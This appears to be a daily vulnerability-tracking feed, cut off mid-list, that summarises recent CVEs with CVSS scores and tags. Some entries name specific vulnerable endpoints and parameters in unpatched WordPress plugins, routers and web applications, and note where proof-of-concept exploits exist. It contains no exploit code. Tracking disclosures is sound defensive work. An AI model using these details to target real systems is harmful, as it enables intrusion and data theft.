212 CVEs tracked today. 52 Critical, 56 High, 93 Medium, 3 Low.
-
CVE-2026-21891
CRITICAL
CVSS 9.4
ZimaOS (fork of CasaOS) through 1.5.0 has an authentication bypass where passwords for system service accounts are not properly validated during login. Attackers can access the system using known service account names with any password. PoC available, EPSS 13.6%.
Authentication Bypass
Zimaos
-
CVE-2026-22234
CRITICAL
CVSS 9.8
OPEXUS eCasePortal before 9.0.45.0 allows unauthenticated access to the Attachments.aspx endpoint with predictable formid values. Attackers can download, delete, or upload files without authentication.
Authentication Bypass
Ecase Portal
-
CVE-2026-22043
CRITICAL
CVSS 9.8
RustFS (alpha.13 to alpha.78) has a privilege escalation where restricted service accounts can self-issue unrestricted credentials by exploiting a flawed deny_only check in the IAM system. PoC available, patch available.
Privilege Escalation
Rustfs
-
CVE-2026-22034
CRITICAL
CVSS 9.8
Snuffleupagus PHP security module before 0.13.0 can be bypassed when upload validation uses VLD-based scripts without the VLD extension installed. This disables the upload security check entirely, allowing malicious PHP file uploads. PoC available, patch available.
PHP
Snuffleupagus
-
CVE-2026-21881
CRITICAL
CVSS 9.1
Kanboard project management (through 1.2.48) has an authentication bypass when REVERSE_PROXY_AUTH is enabled. The application trusts HTTP headers for authentication without verifying the request came from the reverse proxy. Any attacker can impersonate any user including admins. PoC available, patch available.
Authentication Bypass
Kanboard
-
CVE-2026-21877
CRITICAL
CVSS 9.9
n8n workflow automation (through 1.121.2) allows authenticated users to execute arbitrary code via the n8n service, with scope change enabling full compromise of both self-hosted and cloud instances. EPSS 12.5% indicates high exploitation activity. Patch available.
RCE
Remote Code Execution
Code Injection
Node.js
N8n
-
CVE-2026-21876
CRITICAL
CVSS 9.3
OWASP Core Rule Set (CRS) before 4.22.0 and 3.3.8 has a bug in rule 922110 that allows WAF bypass on multipart requests. The rule's capture variables get overwritten when processing multiple parts, allowing SQL injection and other attacks to slip through. PoC available, patch available.
Information Disclosure
-
CVE-2026-21875
CRITICAL
CVSS 9.8
ClipBucket v5 (5.5.2-#187 and below) has blind SQL injection in the channel comment functionality via the obj_id parameter. Unauthenticated attackers can extract the entire database. PoC available.
PHP
SQLi
Clipbucket
-
CVE-2026-21858
CRITICAL
CVSS 10.0
n8n workflow automation (1.65.0 to 1.121.0) allows unauthenticated file access through form-based workflows. A critical CVSS 10.0 vulnerability enabling remote attackers to read sensitive files from the server, with potential for further compromise. PoC available.
Information Disclosure
Path Traversal
Lfi
Node.js
N8n
-
CVE-2025-69258
CRITICAL
CVSS 9.8
Trend Micro Apex Central has a DLL loading vulnerability (LoadLibraryEX) that allows unauthenticated remote attackers to load attacker-controlled DLLs and execute code as SYSTEM. PoC available.
Trendmicro
Apex Central
-
CVE-2025-68717
CRITICAL
CVSS 9.4
KAYSUS KS-WR3600 router (firmware 1.0.5.9.1) has session validation bypass – if any user is logged in, endpoints accept unauthenticated requests. Attackers piggyback on active sessions to execute privileged actions. PoC available.
Authentication Bypass
Ks Wr3600 Firmware
-
CVE-2025-68715
CRITICAL
CVSS 9.1
Panda Wireless PWRU0 devices (firmware 2.2.9) expose WAN, LAN, and wireless configuration endpoints without authentication. Remote attackers can modify all network settings. PoC available.
Denial Of Service
Privilege Escalation
Pwru01 Firmware
-
CVE-2025-67928
CRITICAL
CVSS 9.8
Automotive Listings WordPress theme (through 18.6) has blind SQL injection enabling unauthenticated database extraction.
SQLi
-
CVE-2025-67924
CRITICAL
CVSS 9.8
Corpkit WordPress theme (through 2.0) allows unauthenticated web shell upload via unrestricted file type upload.
File Upload
-
CVE-2025-67921
CRITICAL
CVSS 9.8
Lobo WordPress theme (before 2.8.6) has blind SQL injection enabling unauthenticated database extraction.
SQLi
-
CVE-2025-67920
CRITICAL
CVSS 9.8
Neo Ocular WordPress theme (before 1.2) allows PHP Local File Inclusion through improper filename control in include/require statements.
PHP
Lfi
-
CVE-2025-67915
CRITICAL
CVSS 9.8
Timetics WordPress plugin (through 1.0.46) allows authentication bypass via alternate path, enabling unauthenticated admin access to the booking system.
Industrial
Authentication Bypass
-
CVE-2025-67913
CRITICAL
CVSS 9.8
Aruba HiSpeed Cache WordPress plugin (before 3.0.3) has missing authorization allowing unauthenticated access to cache management functions with full CIA impact.
Authentication Bypass
-
CVE-2025-67911
CRITICAL
CVSS 9.8
Newsletters WordPress plugin by Tribulant (through 4.11) is vulnerable to PHP object injection through deserialization of untrusted data, potentially leading to RCE via POP chains.
Deserialization
-
CVE-2025-67910
CRITICAL
CVSS 9.8
Contentstudio WordPress plugin (through 1.3.7) allows unauthenticated web shell upload, enabling immediate server compromise.
File Upload
-
CVE-2025-67325
CRITICAL
CVSS 9.8
QloApps hotel management system (through 1.7.0) allows unauthenticated web shell upload through the hotel review feature. Attackers can achieve immediate remote code execution. PoC available.
RCE
Qloapps
-
CVE-2025-66916
CRITICAL
CVSS 9.4
RuoYi-Vue-Plus (through 5.5.1) allows arbitrary file read/write through QLExpress expression evaluation in the snailjob workflow node checker. Attackers can use the File class to access any file on the server. PoC available.
RCE
Code Injection
Ruoyi Vue Plus
-
CVE-2025-66913
CRITICAL
CVSS 9.8
JimuReport through 2.1.3 has RCE via user-controlled H2 JDBC URLs. The application passes attacker-supplied JDBC connection strings directly to the H2 driver, which supports directives for arbitrary Java code execution. PoC available.
Java
RCE
Jimureport
-
CVE-2025-62877
CRITICAL
CVSS 9.8
SUSE Harvester virtualization environment (1.5.x, 1.6.x) exposes the OS default SSH login password when using the interactive installer. This affects all hosts provisioned through the interactive method, potentially compromising entire virtualization clusters.
Ssh
Suse
-
CVE-2025-61548
CRITICAL
CVSS 9.8
Print Shop Pro WebDesk 18.34 has SQL injection in the hfInventoryDistFormID parameter of GetUnitPrice. Combined with CVE-2025-61546 (negative quantities), this endpoint has two critical vulnerabilities. PoC available, fixed in 19.69.
SQLi
Print Shop Pro Webdesk
-
CVE-2025-61546
CRITICAL
CVSS 9.1
Print Shop Pro WebDesk 18.34 allows purchasing items with negative quantities, creating financial discrepancies. Attackers can generate credits or manipulate pricing through the GetUnitPrice endpoint. PoC available, fixed in 19.69.
Code Injection
Print Shop Pro Webdesk
-
CVE-2025-61246
CRITICAL
CVSS 9.8
online-shopping-system-php 1.0 has SQL injection in review_action.php via the proId parameter. PoC available.
PHP
SQLi
Online Shopping System
-
CVE-2025-59470
CRITICAL
CVSS 9.0
Veeam allows Backup Operators to execute code as postgres via malicious interval or order parameters. Another operator-to-RCE escalation path with scope change.
PostgreSQL
RCE
-
CVE-2025-59469
CRITICAL
CVSS 9.0
Veeam allows Backup or Tape Operators to write files as root on the server. An operator-level role achieving root file write is a severe privilege escalation with scope change.
Information Disclosure
-
CVE-2025-59468
CRITICAL
CVSS 9.0
Veeam allows Backup Administrators to execute code as postgres via a malicious password parameter. Scope change means OS-level compromise from application-level admin access.
PostgreSQL
RCE
-
CVE-2025-56425
CRITICAL
CVSS 9.1
enaio document management AppConnector (multiple versions) has SMTP command injection via the /osrest/api/organization/s endpoint. Authenticated attackers can inject arbitrary SMTP commands, potentially sending spam or phishing emails through the organization's mail server. PoC available.
Command Injection
Enaio
-
CVE-2025-23993
CRITICAL
CVSS 9.8
Felan Framework (through 1.1.3) also has SQL injection in addition to the auth bypass (CVE-2025-23504). Two critical vulnerabilities in the same plugin create a devastating attack chain.
SQLi
-
CVE-2025-23504
CRITICAL
CVSS 9.8
Felan Framework for WordPress (through 1.1.3) allows authentication bypass through an alternate path, enabling unauthenticated admin access.
Authentication Bypass
-
CVE-2025-22728
CRITICAL
CVSS 9.8
Workreap WordPress plugin (through 3.3.6) has SQL injection enabling unauthenticated database extraction. A freelance marketplace plugin likely containing user PII and financial data.
SQLi
-
CVE-2025-22726
CRITICAL
CVSS 9.1
nK Themes Helper WordPress plugin (through 1.7.9) has SSRF enabling unauthenticated server-side requests to internal services and cloud metadata endpoints.
SSRF
-
CVE-2025-22713
CRITICAL
CVSS 9.8
WooCommerce Orders & Customers Exporter (through 5.4) has SQL injection enabling unauthenticated extraction of all order and customer data including payment details and personal information.
WordPress
SQLi
PHP
-
CVE-2025-22712
CRITICAL
CVSS 9.8
Typify WordPress theme (through 3.0.2) allows PHP Local File Inclusion via improper filename control.
PHP
Lfi
-
CVE-2025-22708
CRITICAL
CVSS 9.8
Mitech WordPress theme (through 2.3.4) allows PHP Local File Inclusion through improper filename control in include/require statements.
PHP
Lfi
Mitech
-
CVE-2025-22707
CRITICAL
CVSS 9.8
Moody WordPress theme (through 2.7.3) allows PHP Local File Inclusion through improper filename control.
PHP
Lfi
Moody
-
CVE-2025-22509
CRITICAL
CVSS 9.8
Atlas WordPress theme (through 2.1.0) allows PHP Local File Inclusion through improper filename control in PHP include statements.
PHP
Lfi
-
CVE-2025-14431
CRITICAL
CVSS 9.8
Navian WordPress theme (through 1.5.4) allows PHP Local File Inclusion through improper filename control.
PHP
Lfi
-
CVE-2025-14430
CRITICAL
CVSS 9.8
Brook WordPress theme (through 2.8.9) allows PHP Local File Inclusion via improper filename control in PHP include statements.
PHP
Lfi
Information Disclosure
-
CVE-2025-14429
CRITICAL
CVSS 9.8
AeroLand WordPress theme (through 1.6.6) allows PHP Local File Inclusion through improper filename control. Unauthenticated RCE possible via include chain.
PHP
Lfi
Aeroland
-
CVE-2025-14360
CRITICAL
CVSS 9.8
Blockons WordPress plugin (through 1.2.15) has missing authorization allowing unauthenticated access to restricted functionality with full CIA impact.
Authentication Bypass
-
CVE-2025-14359
CRITICAL
CVSS 9.8
Oshine WordPress theme (through 7.2.7) allows PHP Local File Inclusion via improper filename control in include/require statements.
PHP
Lfi
-
CVE-2025-14358
CRITICAL
CVSS 9.8
REHub Framework for WordPress (through 19.9.5) has missing authorization allowing unauthenticated access to restricted functionality with full CIA impact.
Authentication Bypass
-
CVE-2025-12550
CRITICAL
CVSS 9.8
OchaHouse WordPress theme (through 2.2.8) allows PHP Local File Inclusion via improper filename control. Same vulnerability class as CVE-2025-12549.
PHP
Lfi
-
CVE-2025-12549
CRITICAL
CVSS 9.8
Rozy Flower Shop WordPress theme (through 1.2.25) allows PHP Local File Inclusion through improper filename control in include/require statements. Unauthenticated RCE possible.
PHP
Lfi
-
CVE-2019-25296
CRITICAL
CVSS 9.8
The WP Cost Estimation plugin for WordPress is vulnerable to arbitrary file uploads and deletion due to missing file type validation in the lfb_upload_form and lfb_removeFile AJAX actions in versions up to, and including, 9.642. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible. Additionally, the attacker can also delete files on the server such as database configuration files, subsequently...
WordPress
RCE
-
CVE-2019-25282
CRITICAL
CVSS 9.8
V-SOL GPON/EPON OLT Platform v2.03 contains an open redirect vulnerability in the script that allows attackers to manipulate the 'parent' GET parameter. [CVSS 9.8 CRITICAL]
Open Redirect
-
CVE-2019-25268
CRITICAL
CVSS 9.8
NREL BEopt 2.8.0.0 contains a DLL hijacking vulnerability that allows attackers to load arbitrary libraries by tricking users into opening application files from remote shares. [CVSS 9.8 CRITICAL]
Privilege Escalation
-
CVE-2017-20216
CRITICAL
CVSS 9.8
FLIR Thermal Camera PT-Series firmware version 8.0.0.64 contains multiple unauthenticated remote command injection vulnerabilities in the controllerFlirSystem.php script. [CVSS 9.8 CRITICAL]
PHP
Command Injection
-
CVE-2026-22521
HIGH
CVSS 7.5
PHP Local File Inclusion in G5Theme Handmade Framework versions up to 3.9 enables authenticated attackers to read arbitrary files on the server through improper validation of include/require statements. An attacker with valid credentials can exploit this vulnerability to access sensitive configuration files, source code, or other protected data without requiring user interaction. No patch is currently available for this vulnerability.
PHP
Lfi
-
CVE-2026-22257
HIGH
CVSS 8.8
Salvo is a Rust web backend framework. [CVSS 8.8 HIGH]
XSS
Salvo
-
CVE-2026-22256
HIGH
CVSS 8.8
Salvo is a Rust web backend framework. [CVSS 8.8 HIGH]
XSS
Salvo
-
CVE-2026-22255
HIGH
CVSS 8.8
Heap buffer overflow in iccDEV versions before 2.3.1.2 allows remote code execution when processing malicious ICC color profiles, affecting applications using the iccDEV library to handle color management data. Public exploit code exists for this vulnerability, and no patches are currently available. An attacker can trigger memory corruption through a crafted ICC profile to achieve arbitrary code execution without user interaction beyond opening the malicious file.
Code Injection
Iccdev
-
CVE-2026-22245
HIGH
CVSS 7.5
Mastodon's IP address filtering bypass (CWE-918) permits attackers to craft requests using unblocked IP ranges to reach local and loopback services, potentially exposing private resources and internal APIs. An unauthenticated remote attacker can exploit incomplete private address range validation in Mastodon instances to perform Server-Side Request Forgery (SSRF) attacks. Patched versions 4.5.4, 4.4.11, 4.3.17, and 4.2.29 are available.
SSRF
Mastodon
-
CVE-2026-22244
HIGH
CVSS 7.2
Remote code execution in OpenMetadata versions before 1.11.4 through Server-Side Template Injection in FreeMarker email templates allows authenticated administrators to execute arbitrary code on the affected system. Public exploit code exists for this vulnerability, and attackers with admin-level access can leverage unsafe template processing to compromise the metadata platform. A patch is available in version 1.11.4 and should be applied immediately.
RCE
Openmetadata
-
CVE-2026-22241
HIGH
CVSS 7.2
Openeclass versions up to 4.2 is affected by unrestricted upload of file with dangerous type (CVSS 7.2).
RCE
Openeclass
-
CVE-2026-22235
HIGH
CVSS 7.5
Ecase Ecomplaint versions up to 9.0.45.0 is affected by authorization bypass through user-controlled key (CVSS 7.5).
Authentication Bypass
Ecase Ecomplaint
-
CVE-2026-22230
HIGH
CVSS 7.6
OPEXUS eCASE Audit contains an access control bypass that allows authenticated users to circumvent administrative restrictions by manipulating client-side JavaScript or crafting direct HTTP requests to re-enable disabled functions and buttons. This vulnerability affects eCASE Platform versions prior to 11.14.1.0 and could enable attackers to perform unauthorized actions that administrators have explicitly blocked. No patch is currently available for affected deployments.
Authentication Bypass
Ecase Audit
-
CVE-2026-22042
HIGH
CVSS 8.8
Incorrect IAM permission validation in RustFS prior to version 1.0.0-alpha.79 permits principals with export-only permissions to execute import operations, enabling unauthorized modification of users, groups, policies, and service accounts. Public exploit code exists for this vulnerability, and authenticated attackers can escalate privileges through malicious IAM imports. The issue affects all pre-1.0.0-alpha.79 versions with no patch currently available.
Privilege Escalation
Rustfs
-
CVE-2026-22035
HIGH
CVSS 7.7
Arbitrary command execution in Greenshot 1.3.310 and earlier stems from insufficient input validation in filename processing, where unsanitized user-supplied filenames are passed directly to shell commands. An attacker can exploit this through a malicious filename containing shell metacharacters to achieve local code execution with user privileges. Public exploit code exists for this vulnerability; users should upgrade to version 1.3.311 or later.
Windows
Command Injection
Greenshot
-
CVE-2026-21873
HIGH
CVSS 7.2
NiceGUI versions 2.22.0 through 3.4.1 contain a cross-site DOM-based XSS vulnerability in the pushstate event listener for ui.sub_pages that allows attackers to manipulate URL fragment identifiers via iframe injection. Public exploit code exists for this vulnerability, and affected users should upgrade to version 3.5.0 or later as no patch is currently available for vulnerable versions.
Python
Nicegui
-
CVE-2026-21869
HIGH
CVSS 8.8
Llama.cpp server endpoints fail to validate the n_discard parameter from JSON input, allowing negative values that trigger out-of-bounds memory writes when the context buffer fills. This memory corruption vulnerability affects LLM inference operations and can be exploited remotely without authentication to crash the service or achieve code execution; public exploit code exists and no patch is currently available.
RCE
Memory Corruption
Denial Of Service
AI / ML
Llama.Cpp
-
CVE-2026-21868
HIGH
CVSS 7.5
Flagforge versions 2.3.2 and earlier suffer from a Regular Expression Denial of Service (ReDoS) vulnerability in the user profile API endpoint that accepts unvalidated usernames containing regex metacharacters, allowing unauthenticated remote attackers to trigger excessive CPU consumption and deny service to legitimate users. The MongoDB regex engine processes these malicious patterns inefficiently, making the platform unavailable without administrator intervention. No patch is currently available; users should implement WAF rules to filter regex metacharacters from username inputs as a temporary mitigation.
MongoDB
Denial Of Service
Flagforge
-
CVE-2026-21638
HIGH
CVSS 8.8
Remote code execution in Ubiquiti airMAX wireless devices (UBB, UBB-XG, UDB-Pro/UDB-Pro-Sector) allows adjacent network attackers to execute arbitrary code by exploiting a protocol vulnerability without authentication. Affected versions include UBB-XG 1.2.2 and earlier, UDB-Pro/UDB-Pro-Sector 1.4.1 and earlier, and UBB 3.1.5 and earlier. No patch is currently available, though vendors have released mitigation versions.
RCE
Udb Pro Sector Firmware
Udb Pro Firmware
Ubb Xg Firmware
Ubb Firmware
-
CVE-2026-21427
HIGH
CVSS 7.8
Arbitrary code execution in PIONEER CORPORATION product installers through DLL search path manipulation allows local attackers with user interaction to execute malicious code with installer privileges. The vulnerability affects multiple products and requires user interaction to trigger, potentially compromising system integrity during software installation. No patch is currently available.
Privilege Escalation
RCE
-
CVE-2026-0719
HIGH
CVSS 8.6
Libsoup's NTLM authentication handler crashes when processing exceptionally long passwords due to a signed integer overflow in memory allocation calculations, affecting GNOME and applications relying on this library for network operations. An unauthenticated remote attacker can trigger a denial-of-service condition by sending specially crafted authentication requests. No patch is currently available.
Denial Of Service
Redhat
Suse
-
CVE-2026-0700
HIGH
CVSS 7.3
Intern Membership Management System versions up to 1.0 contains a vulnerability that allows attackers to sql injection (CVSS 7.3).
PHP
SQLi
Intern Membership Management System
-
CVE-2025-69260
HIGH
CVSS 7.5
A message out-of-bounds read vulnerability in Trend Micro Apex Central could allow a remote attacker to create a denial-of-service condition on affected installations. Please note: authentication is not required in order to exploit this vulnerability. [CVSS 7.5 HIGH]
Trendmicro
Apex Central
-
CVE-2025-69259
HIGH
CVSS 7.5
A message unchecked NULL return value vulnerability in Trend Micro Apex Central could allow a remote attacker to create a denial-of-service condition on affected installations. Please note: authentication is not required in order to exploit this vulnerability.. [CVSS 7.5 HIGH]
Trendmicro
Apex Central
-
CVE-2025-68891
HIGH
CVSS 7.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ryan Sutana WP App Bar wp-app-bar allows Reflected XSS.This issue affects WP App Bar: from n/a through <= 1.5. [CVSS 7.1 HIGH]
WordPress
XSS
PHP
-
CVE-2025-68889
HIGH
CVSS 7.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pinpoll Pinpoll pinpoll allows Reflected XSS.This issue affects Pinpoll: from n/a through <= 4.0.0. [CVSS 7.1 HIGH]
XSS
-
CVE-2025-68887
HIGH
CVSS 7.1
CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory wp-businessdirectory is affected by cross-site scripting (xss) (CVSS 7.1).
WordPress
XSS
-
CVE-2025-68874
HIGH
CVSS 7.1
Shahjada Visitor Stats Widget visitor-stats-widget is affected by cross-site scripting (xss) (CVSS 7.1).
XSS
-
CVE-2025-68873
HIGH
CVSS 7.1
chloédigital PRIMER by chloédigital primer-by-chloedigital is affected by cross-site scripting (xss) (CVSS 7.1).
XSS
-
CVE-2025-68719
HIGH
CVSS 8.8
KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 mishandle configuration management. Once any user is logged in and maintains an active session, an attacker can directly query the backup endpoint and download a full configuration archive. [CVSS 8.8 HIGH]
Information Disclosure
Ks Wr3600 Firmware
-
CVE-2025-68716
HIGH
CVSS 8.4
KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 enable the SSH service enabled by default on the LAN interface. The root account is configured with no password, and administrators cannot disable SSH or enforce authentication via the CLI or web GUI. [CVSS 8.4 HIGH]
Ssh
Ks Wr3600 Firmware
-
CVE-2025-68151
HIGH
CVSS 7.5
CoreDNS is a DNS server that chains plugins. Prior to version 1.14.0, multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limit...
Dns
Denial Of Service
Coredns
Redhat
Suse
-
CVE-2025-67937
HIGH
CVSS 8.1
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Hendon hendon allows PHP Local File Inclusion.This issue affects Hendon: from n/a through < 1.7. [CVSS 8.1 HIGH]
PHP
Lfi
Hendon
-
CVE-2025-67936
HIGH
CVSS 8.1
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Curly curly allows PHP Local File Inclusion.This issue affects Curly: from n/a through < 3.3. [CVSS 8.1 HIGH]
PHP
Lfi
Curly
-
CVE-2025-67935
HIGH
CVSS 8.1
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Optimize optimizewp allows PHP Local File Inclusion.This issue affects Optimize: from n/a through < 2.4. [CVSS 8.1 HIGH]
PHP
Lfi
Optimize
-
CVE-2025-67934
HIGH
CVSS 8.1
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Wellspring wellspring allows PHP Local File Inclusion.This issue affects Wellspring: from n/a through < 2.8. [CVSS 8.1 HIGH]
PHP
Spring
Lfi
Wellspring
-
CVE-2025-67931
HIGH
CVSS 7.5
Insertion of Sensitive Information Into Sent Data vulnerability in AITpro BulletProof Security bulletproof-security allows Retrieve Embedded Sensitive Data.This issue affects BulletProof Security: from n/a through <= 6.9. [CVSS 7.5 HIGH]
Information Disclosure
-
CVE-2025-67926
HIGH
CVSS 8.8
Missing Authorization vulnerability in Shahjahan Jewel Fluent Support fluent-support allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fluent Support: from n/a through <= 1.10.4. [CVSS 8.8 HIGH]
Authentication Bypass
-
CVE-2025-67925
HIGH
CVSS 8.1
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in zozothemes Corpkit corpkit allows PHP Local File Inclusion.This issue affects Corpkit: from n/a through <= 2.0. [CVSS 8.1 HIGH]
PHP
Lfi
-
CVE-2025-67919
HIGH
CVSS 8.1
WofficeIO Woffice Core woffice-core is affected by authorization bypass through user-controlled key (CVSS 8.1).
Authentication Bypass
-
CVE-2025-67917
HIGH
CVSS 8.1
Missing Authorization vulnerability in shinetheme Traveler traveler allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Traveler: from n/a through <= 3.2.6. [CVSS 8.1 HIGH]
Authentication Bypass
-
CVE-2025-67914
HIGH
CVSS 7.5
Path Traversal: '.../...//' vulnerability in beeteam368 VidMov vidmov allows Path Traversal.This issue affects VidMov: from n/a through <= 2.3.8. [CVSS 7.5 HIGH]
Path Traversal
-
CVE-2025-67089
HIGH
CVSS 8.1
A command injection vulnerability exists in the GL-iNet GL-AXT1800 router firmware v4.6.8. The vulnerability is present in the `plugins.install_package` RPC method, which fails to properly sanitize user input in package names. [CVSS 8.1 HIGH]
Command Injection
Gl Axt1800 Firmware
-
CVE-2025-66001
HIGH
CVSS 8.8
NeuVector supports login authentication through OpenID Connect. However, the TLS verification (which verifies the remote server's authenticity and integrity) for OpenID Connect is not enforced by default. [CVSS 8.8 HIGH]
Tls
Suse
-
CVE-2025-65518
HIGH
CVSS 7.5
Plesk Obsidian versions 8.0.1 through 18.0.73 are vulnerable to a Denial of Service (DoS) condition. [CVSS 7.5 HIGH]
PHP
Denial Of Service
Plesk Obsidian
Redhat
-
CVE-2025-63611
HIGH
CVSS 8.7
Cross-Site Scripting in phpgurukul Hostel Management System v2.1 user-provided complaint fields (Explain the Complaint) submitted via /register-complaint.php are stored and rendered unescaped in the admin viewer (/admin/complaint-details.php?cid=<id>). [CVSS 8.7 HIGH]
PHP
XSS
Hostel Management System
-
CVE-2025-56424
HIGH
CVSS 7.5
An issue in Insiders Technologies GmbH e-invoice pro before release 1 Service Pack 2 allows a remote attacker to cause a denial of service via a crafted script [CVSS 7.5 HIGH]
Denial Of Service
E Invoice Pro
-
CVE-2025-55125
HIGH
CVSS 7.8
This vulnerability allows a Backup or Tape Operator to perform remote code execution (RCE) as root by creating a malicious
backup configuration file. [CVSS 7.8 HIGH]
RCE
-
CVE-2025-50334
HIGH
CVSS 7.5
An issue in Technitium DNS Server v.13.5 allows a remote attacker to cause a denial of service via the rate-limiting component [CVSS 7.5 HIGH]
Dns
Denial Of Service
Dnsserver
Redhat
-
CVE-2025-22715
HIGH
CVSS 8.1
Missing Authorization vulnerability in loopus WP Attractive Donations System - Easy Stripe & Paypal donations WP_AttractiveDonationsSystem allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Attractive Donations System - Easy Stripe & Paypal donations: from n/a through <= 1.25. [CVSS 8.1 HIGH]
Authentication Bypass
WordPress
PHP
-
CVE-2025-15464
HIGH
CVSS 7.5
Exported Activity allows external applications to gain application context and directly launch Gmail with inbox access, bypassing security controls. [CVSS 7.5 HIGH]
Authentication Bypass
Fun Print
-
CVE-2025-14436
HIGH
CVSS 7.2
The Brevo for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘user_connection_id’ parameter in all versions up to, and including, 4.0.49 due to insufficient input sanitization and output escaping. [CVSS 7.2 HIGH]
WordPress
XSS
PHP
-
CVE-2025-14025
HIGH
CVSS 8.5
A flaw was found in Ansible Automation Platform (AAP). Read-only scoped OAuth2 API Tokens in AAP, are enforced at the Gateway level for Gateway-specific operations. [CVSS 8.5 HIGH]
Information Disclosure
Redhat
-
CVE-2019-25291
HIGH
CVSS 7.5
INIM Electronics Smartliving SmartLAN/G/SI <=6.x contains hard-coded credentials in its Linux distribution image that cannot be changed through normal device operations. [CVSS 7.5 HIGH]
Linux
Industrial
-
CVE-2019-25289
HIGH
CVSS 8.8
SmartLiving SmartLAN <=6.x contains an authenticated remote command injection vulnerability in the web.cgi binary through the 'par' POST parameter with the 'testemail' module. [CVSS 8.8 HIGH]
Command Injection
-
CVE-2019-25279
HIGH
CVSS 7.5
Facesentry Access Control System Firmware versions up to 5.7.0 is affected by cleartext storage of sensitive information (CVSS 7.5).
SQLi
Facesentry Access Control System Firmware
-
CVE-2019-25231
HIGH
CVSS 8.4
devolo dLAN Cockpit 4.3.1 contains an unquoted service path vulnerability in the 'DevoloNetworkService' that allows local non-privileged users to potentially execute arbitrary code. [CVSS 8.4 HIGH]
RCE
-
CVE-2017-20215
HIGH
CVSS 8.8
FLIR Thermal Camera FC-S/PT firmware version 8.0.0.64 contains an authenticated OS command injection vulnerability that allows attackers to execute shell commands with root privileges. [CVSS 8.8 HIGH]
Command Injection
-
CVE-2017-20214
HIGH
CVSS 7.5
FLIR Thermal Camera F/FC/PT/D firmware version 8.0.0.64 contains hard-coded SSH credentials that cannot be changed through normal camera operations. Attackers can leverage these persistent, unmodifiable credentials to gain unauthorized remote access to the thermal camera system. [CVSS 7.5 HIGH]
Ssh
-
CVE-2017-20213
HIGH
CVSS 7.5
FLIR Thermal Camera F/FC/PT/D Stream firmware version 8.0.0.64 contains an unauthenticated vulnerability that allows remote attackers to access live camera streams without credentials. [CVSS 7.5 HIGH]
Authentication Bypass
-
CVE-2026-22588
MEDIUM
CVSS 6.5
Spree e-commerce platform versions prior to 4.10.2, 5.0.7, 5.1.9, and 5.2.5 contain an authenticated insecure direct object reference vulnerability allowing logged-in users to access and retrieve address information belonging to other customers by manipulating address identifiers during order modification. Public exploit code exists for this vulnerability, which has been patched in the aforementioned versions.
Ruby
Spree
-
CVE-2026-22587
MEDIUM
CVSS 5.5
Ideagen DevonWay is vulnerable to stored cross-site scripting in the Reports page, allowing authenticated attackers to inject malicious scripts that execute when other users view affected reports. This vulnerability impacts all users with access to DevonWay reports and enables session hijacking, credential theft, or malware distribution. No patch is currently available; versions 2.62.4 and 2.62 LTS are noted as fixed versions.
XSS
-
CVE-2026-22522
MEDIUM
CVSS 6.5
Munir Kamal Block Slider through version 2.2.3 fails to properly enforce access control, allowing authenticated users to access sensitive information they should not have permission to view. An attacker with valid credentials could exploit this missing authorization check to read confidential data. No patch is currently available for this vulnerability.
Authentication Bypass
-
CVE-2026-22519
MEDIUM
CVSS 6.5
Stored cross-site scripting in BuddyDev MediaPress through version 1.6.2 enables authenticated attackers to inject malicious scripts that execute in other users' browsers, potentially compromising session data or performing unauthorized actions. The vulnerability requires user interaction and affects the confidentiality, integrity, and availability of affected installations. No patch is currently available.
XSS
-
CVE-2026-22518
MEDIUM
CVSS 6.5
DOM-based cross-site scripting in pencilwp X Addons for Elementor through version 1.0.23 allows authenticated attackers to inject malicious scripts that execute in users' browsers with user interaction. An attacker with login credentials can exploit this vulnerability to steal session tokens, deface content, or perform actions on behalf of affected users. No patch is currently available for this vulnerability.
XSS
-
CVE-2026-22517
MEDIUM
CVSS 5.4
Improper access control in GA4WP: Google Analytics for WordPress versions up to 2.10.0 allows authenticated users to modify or disable analytics functionality through misconfigured permissions. An attacker with low-privilege WordPress access could leverage this vulnerability to manipulate analytics data or disrupt monitoring capabilities. The vulnerability carries a MEDIUM severity rating with no patch currently available.
WordPress
Industrial
-
CVE-2026-22492
MEDIUM
CVSS 4.3
Docket Cache versions through 24.07.04 contain an access control bypass that allows authenticated users to perform unauthorized actions due to improper permission validation. An attacker with valid credentials can exploit this vulnerability to cause denial of service or access restricted functionality. No patch is currently available.
Authentication Bypass
-
CVE-2026-22490
MEDIUM
CVSS 5.4
Improper access control in the Bulk Landing Page Creator for WordPress (LPagery) plugin versions through 2.4.9 allows authenticated users to modify or delete landing pages without proper authorization checks. An attacker with low-privilege WordPress access could exploit this to tamper with site content or disrupt operations. No patch is currently available.
WordPress
-
CVE-2026-22489
MEDIUM
CVSS 4.3
Wptexture Image Slider Slideshow versions through 1.8 contain an authorization bypass flaw that allows authenticated users to modify content by manipulating access control parameters. An attacker with user-level access could exploit incorrectly configured security controls to perform unauthorized actions beyond their assigned privileges. No patch is currently available for this vulnerability.
Authentication Bypass
-
CVE-2026-22488
MEDIUM
CVSS 5.3
